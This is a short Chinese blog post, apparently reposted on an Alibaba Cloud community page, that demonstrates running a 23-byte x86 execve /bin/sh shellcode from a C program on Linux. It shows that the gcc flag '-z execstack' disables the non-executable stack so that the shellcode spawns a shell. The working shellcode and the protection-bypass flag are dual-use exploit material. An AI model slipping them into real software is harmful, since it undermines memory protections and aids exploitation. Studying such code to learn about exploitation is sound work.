linux下執行shellcode__linux

來源:互聯網
上載者:User

參考了其他文章。

 

C語言代碼如下:

#include <stdio.h>#include <string.h>char sc[] =  "\x31\xc0"  "\x50"  "\x68\x6e\x2f\x73\x68"  "\x68\x2f\x2f\x62\x69"  "\x89\xe3"  "\x50"  "\x53"  "\x89\xe1"  "\xb0\x0b"  "\xcd\x80";int main(){  void (*fp)(void) = (void (*)(void))sc;  printf("Length: %d\n",strlen(sc));  fp();}


上面的sc就是shellcode。原始碼儲存為execve.c,然後編譯、串連。

[yang@localhost ~]$ gcc -o execve execve.c [yang@localhost ~]$ ./execve Length: 23孌甸敊璿[yang@localhost ~]$ 


結果如上,沒有執行shellcode,怎麼回事。我的gcc版本是4.3.0的。這個版本的gcc,編譯出來的可執行檔的堆棧段,是不可執行檔。

加上參數-z execstack就能變成可執行了。

[yang@localhost ~]$ gcc -z execstack -o execve execve.c [yang@localhost ~]$ ./execve Length: 23sh-3.2$


獲得了一個shell

 

 

聯繫我們

該頁面正文內容均來源於網絡整理,並不代表阿里雲官方的觀點,該頁面所提到的產品和服務也與阿里云無關,如果該頁面內容對您造成了困擾,歡迎寫郵件給我們,收到郵件我們將在5個工作日內處理。

如果您發現本社區中有涉嫌抄襲的內容,歡迎發送郵件至: info-contact@alibabacloud.com 進行舉報並提供相關證據,工作人員會在 5 個工作天內聯絡您,一經查實,本站將立刻刪除涉嫌侵權內容。

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.